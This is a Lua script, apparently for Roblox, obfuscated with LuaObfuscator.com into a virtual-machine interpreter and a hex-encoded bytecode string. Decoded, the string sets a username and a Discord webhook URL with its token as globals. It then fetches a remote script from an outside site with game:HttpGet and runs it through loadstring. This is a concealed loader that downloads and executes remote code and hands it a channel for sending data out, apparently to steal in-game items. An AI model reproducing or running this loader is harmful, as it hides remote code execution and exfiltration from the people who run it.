--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v85=(v31/((5 -3)^(v32-(2 -1))))%(((1271 -(226 + 1044)) + 1)^(((v33-(1 + 0)) -(v32-((3823 -2945) -(282 + 595)))) + (1 -0))) ;return v85-(v85%(2 -1)) ;else local v86=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v86 + v86))>=v86) and (1 -0)) or (568 -(367 + (318 -(32 + 85)))) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0;local v35;local v36;local v37;local v38;while true do if (v34==(1 + 0)) then return (v38 * (3720433 + 13056783)) + (v37 * (66493 -(892 + 65))) + (v36 * (610 -354)) + v35 ;end if (v34==(0 -0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (4 -1) );v19=v19 + 4 ;v34=351 -(87 + (443 -(67 + 113))) ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (0==v39) then v40=0 + 0 ;v41=nil;v39=2 -1 ;end if (v39~=(1 + 0)) then else v42=nil;v43=nil;v39=1 + 1 ;end if (v39==3) then v46=nil;v47=nil;v39=2 + 2 ;end if (v39==(7 -3)) then while true do if (v40==(1263 -(1091 + 171))) then local v97=0;while true do if (0==v97) then v43=nil;v44=nil;v97=1 + 0 ;end if (v97~=(3 -2)) then else v40=6 -4 ;break;end end end if (v40==2) then local v98=0 -0 ;while true do if (v98~=0) then else v45=nil;v46=nil;v98=1901 -(106 + 1794) ;end if ((1 + 0)~=v98) then else v40=377 -(123 + 251) ;break;end end end if (v40==(8 -5)) then v47=nil;while true do local v100=0 -0 ;while true do if (v100==1) then if (v41~=(700 -(208 + 490))) then else local v114=114 -(4 + 110) ;while true do if (v114==0) then for v158=1 + 0 ,v46 do local v159=0 + 0 ;local v160;local v161;local v162;while true do if (v159~=0) then else v160=103 -(17 + 86) ;v161=nil;v159=1 + 0 ;end if (v159==1) then v162=nil;while true do if (v160==(0 -0)) then local v169=836 -(660 + 176) ;while true do if (0~=v169) then else v161=v22();v162=nil;v169=1 + 0 ;end if (v169~=(1 -0)) then else v160=3 -2 ;break;end end end if (v160==1) then if (v161==(203 -(14 + 188))) then v162=v22()~=(675 -(534 + 141)) ;elseif (v161==(3 -1)) then v162=v25();elseif (v161~=3) then else v162=v26();end v47[v158]=v162;break;end end break;end end end v45[3]=v22();v114=1 + 0 ;end if (v114~=(66 -(30 + 35))) then else for v163=1 + 0 ,v24() do local v164=0;local v165;local v166;while true do if (0~=v164) then else v165=0 + 0 ;v166=nil;v164=1 -0 ;end if (v164==1) then while true do if (v165==(0 -0)) then v166=v22();if (v21(v166,1 -0 ,2 -1 )==(0 -0)) then local v171=0 + 0 ;local v172;local v173;local v174;local v175;local v176;while true do if (v171==0) then v172=0;v173=nil;v171=1 + 0 ;end if ((397 -(115 + 281))~=v171) then else v174=nil;v175=nil;v171=4 -2 ;end if (v171~=(2 + 0)) then else v176=nil;while true do if ((4 -2)==v172) then while true do if (v173~=(0 -0)) then else local v181=320 -(53 + 267) ;local v182;while true do if (v181==0) then v182=0 + 0 ;while true do if ((867 -(550 + 317))==v182) then local v191=0 -0 ;while true do if ((0 -0)==v191) then local v197=0 -0 ;while true do if (v197==(2 -1)) then v191=286 -(134 + 151) ;break;end if (v197~=(1665 -(970 + 695))) then else v174=v21(v166,3 -1 ,3);v175=v21(v166,1994 -(582 + 1408) ,6);v197=1 + 0 ;end end end if (v191==(3 -2)) then v182=1 -0 ;break;end end end if ((3 -2)==v182) then v173=127 -(116 + 10) ;break;end end break;end end end if ((1 + 0)~=v173) then else local v183=738 -(542 + 196) ;local v184;while true do if ((1824 -(1195 + 629))~=v183) then else v184=0;while true do if ((1 -0)~=v184) then else v173=3 -1 ;break;end if (v184==(241 -(187 + 54))) then local v192=0 + 0 ;while true do if (v192~=(780 -(162 + 618))) then else v176={v23(),v23(),nil,nil};if (v174==0) then local v198=0;local v199;local v200;while true do if ((405 -(118 + 287))==v198) then v199=0 -0 ;v200=nil;v198=1 -0 ;end if (1~=v198) then else while true do if (v199==0) then v200=0 -0 ;while true do if (v200==0) then v176[4 -1 ]=v23();v176[4]=v23();break;end end break;end end break;end end elseif (v174==(4 -3)) then v176[3]=v24();elseif (v174==(1 + 1)) then v176[3]=v24() -((1 + 1)^(993 -(553 + 424))) ;elseif (v174~=(5 -2)) then else local v203=1636 -(1373 + 263) ;local v204;while true do if (v203==(0 + 0)) then v204=1000 -(451 + 549) ;while true do if (v204==(0 + 0)) then v176[1 + 2 ]=v24() -((2 -0)^16) ;v176[4]=v23();break;end end break;end end end v192=1;end if (v192==(2 -1)) then v184=1 -0 ;break;end end end end break;end end end if (v173~=2) then else local v185=1384 -(746 + 638) ;local v186;while true do if (v185==(0 + 0)) then v186=0 -0 ;while true do if (v186~=1) then else v173=344 -(218 + 123) ;break;end if (v186~=(1581 -(1535 + 46))) then else if (v21(v175,1 + 0 ,1)~=(2 -1)) then else v176[2]=v47[v176[2]];end if (v21(v175,2,1 + 1 )==(561 -(306 + 254))) then v176[1 + 2 ]=v47[v176[3]];end v186=754 -(239 + 514) ;end end break;end end end if (v173==(5 -2)) then if (v21(v175,1470 -(899 + 568) ,3)==(1 + 0)) then v176[4]=v47[v176[9 -5 ]];end v42[v163]=v176;break;end end break;end if (v172~=0) then else local v177=603 -(268 + 335) ;local v178;while true do if (v177==(0 + 0)) then v178=290 -(60 + 230) ;while true do if (v178~=(573 -(426 + 146))) then else v172=1;break;end if (v178==(1202 -(373 + 829))) then local v190=0;while true do if (v190==(1 + 0)) then v178=1457 -(282 + 1174) ;break;end if (v190~=(1130 -(369 + 761))) then else v173=811 -(569 + 242) ;v174=nil;v190=1;end end end end break;end end end if ((1 -0)==v172) then local v179=0;local v180;while true do if (v179==0) then v180=0 -0 ;while true do if (v180~=(0 -0)) then else v175=nil;v176=nil;v180=1 + 0 ;end if ((1 + 0)==v180) then v172=2;break;end end break;end end end end break;end end end break;end end break;end end end v41=3;break;end end end if (v41==3) then local v115=1024 -(706 + 318) ;while true do if ((1251 -(721 + 530))==v115) then for v167=1272 -(945 + 326) ,v24() do v43[v167-(337 -(144 + 192)) ]=v29();end return v45;end end end break;end if (v100==(0 -0)) then if (v41==(1 + 0)) then local v116=0 + 0 ;while true do if (v116~=(701 -(271 + 429))) then else v47={};v41=2;break;end if (v116==0) then v45={v42,v43,nil,v44};v46=v24();v116=1501 -(1408 + 92) ;end end end if (v41==(1086 -(461 + 625))) then local v117=0;local v118;while true do if (v117==(1288 -(993 + 295))) then v118=0 + 0 ;while true do if (v118==(1171 -(418 + 753))) then v42={};v43={};v118=1 + 0 ;end if ((2 -1)==v118) then v44={};v41=1 + 0 ;break;end end break;end end end v100=1 + 0 ;end end end break;end if (v40~=(0 + 0)) then else local v99=0 + 0 ;while true do if (v99~=(0 + 0)) then else v41=0 -0 ;v42=nil;v99=530 -(406 + 123) ;end if ((3 -2)==v99) then v40=1770 -(1749 + 20) ;break;end end end end break;end if (v39==(2 -0)) then v44=nil;v45=nil;v39=3 + 0 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=(1804 -(245 + 702)) -(564 + 292) ;local v51=(v21(v49,1 -0 ,(189 -129) -40 ) * ((306 -(244 + 60))^(25 + 7))) + v48 ;local v52=v21(v49,497 -(41 + 435) ,1032 -(938 + 63) );local v53=((v21(v49,25 + 7 )==(1126 -(936 + 61 + 128))) and  -(1 + 0)) or (2 -1) ;if (v52==(1898 -(260 + 1638))) then if (v51==0) then return v53 * 0 ;else v52=(441 -(382 + 58)) -0 ;v50=(5174 -3561) -(1301 + 264 + 48) ;end elseif (v52==((2614 -1349) + 782)) then return ((v51==((0 -0) -0)) and (v53 * ((1139 -(782 + (1561 -(902 + 303))))/(267 -(176 + 91))))) or (v53 * NaN) ;end return v8(v53,v52-(2665 -1642) ) * (v50 + (v51/((2 -0)^(924 -(826 + 46))))) ;end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(0 -0)) then return "";end end v55=v3(v16,v19,(v19 + v54) -(2 -1) );v19=v19 + v54 ;local v56={};for v69=1 + 0 , #v55 do v56[v69]=v2(v1(v3(v55,v69,v69)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=1690 -(1121 + 569) ;local v58;while true do if (0==v57) then v58=v1(v16,v19,v19);v19=v19 + (2 -1) ;v57=215 -(22 + 192) ;end if (v57==(684 -(483 + (762 -(334 + 228))))) then return v58;end end end v23=nil;function v23()local v59=(0 + 0) -0 ;local v60;local v61;while true do if (v59==(0 -0)) then v60,v61=v1(v16,v19,v19 + 2 );v19=v19 + (2 -0) ;v59=1 + (0 -0) ;end if (1==v59) then return (v61 * (492 -(141 + 95))) + v60 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v62)if (v1(v62,2)==79) then v20=v0(v3(v62,1,1));return "";else local v87=v2(v0(v62,16));if v20 then local v91=0;local v92;while true do if (v91==0) then v92=v5(v87,v20);v20=nil;v91=1;end if (v91==1) then return v92;end end else return v87;end end end);v18=1;end if (v18==7) then function v30(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v71=v66;local v72=v67;local v73=v68;local v74=v28;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v88=0,v79 do if (v88>=v73) then v77[v88-v73 ]=v78[v88 + 1 ];else v81[v88]=v78[v88 + 1 ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[1];if (v84<=10) then if (v84<=4) then if (v84<=1) then if (v84==0) then v81[v83[2]]=v83[3]~=0 ;else do return;end end elseif (v84<=2) then local v102=v83[2];local v103=v81[v83[3]];v81[v102 + 1 ]=v103;v81[v102]=v103[v83[4]];elseif (v84==3) then v75=v83[3];elseif ((v83[3]=="_ENV") or (v83[3]=="getfenv")) then v81[v83[2]]=v65;else v81[v83[2]]=v65[v83[3]];end elseif (v84<=7) then if (v84<=5) then v65[v83[3]]=v81[v83[2]];elseif (v84==6) then v81[v83[2]]();else local v120=v83[2];local v121,v122=v74(v81[v120](v13(v81,v120 + 1 ,v83[3])));v76=(v122 + v120) -1 ;local v123=0;for v142=v120,v76 do v123=v123 + 1 ;v81[v142]=v121[v123];end end elseif (v84<=8) then v75=v83[3];elseif (v84==9) then do return;end else local v124=v83[2];v81[v124]=v81[v124](v13(v81,v124 + 1 ,v76));end elseif (v84<=15) then if (v84<=12) then if (v84>11) then if ((v83[3]=="_ENV") or (v83[3]=="getfenv")) then v81[v83[2]]=v65;else v81[v83[2]]=v65[v83[3]];end else local v110=v83[2];v81[v110]=v81[v110](v13(v81,v110 + 1 ,v76));end elseif (v84<=13) then v81[v83[2]]();elseif (v84==14) then v81[v83[2]]=v83[3];else v81[v83[2]]=v83[3];end elseif (v84<=18) then if (v84<=16) then if (v81[v83[2]]==v83[4]) then v75=v75 + 1 ;else v75=v83[3];end elseif (v84==17) then v81[v83[2]]=v83[3]~=0 ;else local v135=v83[2];local v136,v137=v74(v81[v135](v13(v81,v135 + 1 ,v83[3])));v76=(v137 + v135) -1 ;local v138=0;for v145=v135,v76 do v138=v138 + 1 ;v81[v145]=v136[v138];end end elseif (v84<=19) then v65[v83[3]]=v81[v83[2]];elseif (v84==20) then if (v81[v83[2]]==v83[4]) then v75=v75 + 1 ;else v75=v83[3];end else local v139=0;local v140;local v141;while true do if (v139==1) then v81[v140 + 1 ]=v141;v81[v140]=v141[v83[4]];break;end if (v139==0) then v140=v83[2];v141=v81[v83[3]];v139=1;end end end v75=v75 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D65030A3O00557365436F646542595303073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3138393137353931393738313335313O342F4F4B526C4D7A2O514755655237636E70344478697834637A4A53314F794541745158526957496D79507255412D5664356151674A7959326E62524434583571683533687A00153O00120E3O00013O0026103O000C000100020004033O000C000100120C000100033O00120C000200043O00201500020002000500120E000400066O000500014O0007000200054O000B00013O00022O000D0001000100010004033O001400010026103O0001000100010004033O0001000100120E000100083O001213000100073O00120E0001000A3O001213000100093O00120E3O00023O0004033O000100012O00093O00017O00",v9(),...);
